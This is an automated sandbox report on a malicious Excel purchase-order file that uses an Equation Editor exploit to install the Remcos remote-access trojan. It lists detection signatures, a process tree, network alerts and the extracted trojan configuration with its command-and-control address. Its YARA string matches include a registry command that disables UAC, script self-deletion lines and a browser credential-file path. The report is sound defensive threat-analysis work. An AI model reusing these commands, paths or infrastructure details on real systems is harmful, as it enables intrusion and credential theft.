Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-00006799868.xls

Overview

General Information

Sample name:PO-00006799868.xls
Analysis ID:1532154
MD5:e78662c0ecb1a705f3f16366cff45409
SHA1:0de40063c9028a33b77d4cb3de06dec0f705059b
SHA256:33c790e2db3f22fbd80c43a82837b5fb7a0f4a317b25dbab1e984baf95fa82bc
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Excel sheet contains many unusual embedded objects
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3564 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3164 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • taskhostw.exe (PID: 3260 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)
      • name.exe (PID: 3328 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)
        • svchost.exe (PID: 3316 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
          • svchost.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw" MD5: 54A47F6B5E09A77E61649109C6A08866)
          • svchost.exe (PID: 3036 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld" MD5: 54A47F6B5E09A77E61649109C6A08866)
          • svchost.exe (PID: 1908 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • wscript.exe (PID: 1404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • name.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)
      • svchost.exe (PID: 2176 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2030:$obj2: \objdata
  • 0x2048:$obj3: \objupdate
  • 0x200c:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2030:$obj2: \objdata
  • 0x2048:$obj3: \objupdate
  • 0x200c:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4b8:$a1: Remcos restarted by watchdog!
        • 0x6ca30:$a3: %02i:%02i:%02i:%03i
        00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6657c:$str_b2: Executing file:
        • 0x675fc:$str_b3: GetDirectListeningPort
        • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67128:$str_b7: \update.vbs
        • 0x665a4:$str_b9: Downloaded file:
        • 0x66590:$str_b10: Downloading file:
        • 0x66634:$str_b12: Failed to upload file:
        • 0x675c4:$str_b13: StartForward
        • 0x675e4:$str_b14: StopForward
        • 0x67080:$str_b15: fso.DeleteFile "
        • 0x67014:$str_b16: On Error Resume Next
        • 0x670b0:$str_b17: fso.DeleteFolder "
        • 0x66624:$str_b18: Uploaded file:
        • 0x665e4:$str_b19: Unable to delete:
        • 0x67048:$str_b20: while fso.FileExists("
        • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 39 entries
        SourceRuleDescriptionAuthorStrings
        18.2.svchost.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          18.2.svchost.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            18.2.svchost.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              18.2.svchost.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aab8:$a1: Remcos restarted by watchdog!
              • 0x6b030:$a3: %02i:%02i:%02i:%03i
              18.2.svchost.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                Click to see the 43 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.7.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3164, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3164, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3164, Protocol: tcp, SourceIp: 104.168.7.25, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3564, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3260, ProcessName: taskhostw.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\taskhostw.exe, NewProcessName: C:\Users\user\AppData\Roaming\taskhostw.exe, OriginalFileName: C:\Users\user\AppData\Roaming\taskhostw.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3564, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3260, ProcessName: taskhostw.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1404, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3328, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3316, ProcessName: svchost.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1404, ProcessName: wscript.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3856, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3328, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\taskhostw.exe" , ProcessId: 3316, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                Stealing of Sensitive Information

                barindex
                Source: Registry Key setAuthor: Joe Security: Data: Details: 24 02 9C 59 2D EF 50 20 D1 91 9D B5 93 7A 2E 6D 2C 2A DE 2B AF 5F 79 2B F0 1D 9F 3C F0 B1 E8 C5 7E 3D 5C E5 B2 02 16 9E 1A D7 18 B5 58 68 E1 4C 11 21 7B DD 04 AF D5 D5 CD 62 44 E0 DF 63 AC 0D , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 3316, TargetObject: HKEY_CURRENT_USER\Software\Rmc-FI789R\exepath
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-12T16:40:02.455454+020020365941Malware Command and Control Activity Detected192.168.2.2249171107.173.4.162404TCP
                2024-10-12T16:40:03.589923+020020365941Malware Command and Control Activity Detected192.168.2.2249172107.173.4.162404TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-12T16:39:56.817090+020020220501A Network Trojan was detected104.168.7.2580192.168.2.2249170TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-12T16:39:56.905812+020020220511A Network Trojan was detected104.168.7.2580192.168.2.2249170TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-12T16:40:03.717468+020028033043Unknown Traffic192.168.2.2249173178.237.33.5080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "107.173.4.16:2404:1", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: PO-00006799868.xlsReversingLabs: Detection: 13%
                Source: PO-00006799868.xlsVirustotal: Detection: 14%Perma Link
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exeJoe Sandbox ML: detected
                Source: PO-00006799868.xlsJoe Sandbox ML: detected
                Source: name.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2c49e6e3-a

                Exploits

                barindex
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.7.25 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\taskhostw.exeJump to behavior
                Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.drStream path '_1790234746/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.drStream path '_1790234751/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: Binary string: wntdll.pdb source: name.exe, 0000000B.00000003.456762758.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.456458647.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485897066.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000011.00000003.485739921.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose,10_2_0021449B
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021C75D FindFirstFileW,FindClose,10_2_0021C75D
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0021C7E8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose,11_2_012C449B
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CC75D FindFirstFileW,FindClose,11_2_012CC75D
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_012CC7E8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_012CF17E
